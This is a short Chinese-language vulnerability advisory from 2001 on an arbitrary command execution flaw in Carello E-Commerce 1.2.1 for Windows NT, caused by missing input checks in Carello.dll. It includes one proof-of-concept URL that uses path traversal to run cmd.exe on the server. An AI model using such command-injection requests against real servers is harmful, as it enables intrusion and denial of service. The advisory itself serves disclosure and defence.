Carello E-Commerce 存在任意文件可执行漏洞发布时间:2001-05-16 更新时间:2001-05-16 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 - Carello E-Commerce V1.2.1 for Windows NT详细描述 Carello.dll存在对输入没有正确检查,可以导致执行系统任意命令, http://foo.org/scripts/Carello/Carello.dll?CARELLOCODE=SITE2& VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt 上面的范例会导致INETINFO.EXE利用CPU率达100%,而且WEB服务器会停止其他 HTTP请求,命令会以WEB SERVER的去权利执行。 测试代码 见描述部分。 解决方案 尚无 相关信息 Peter Gründl <peter.grundl@defcom.com> |
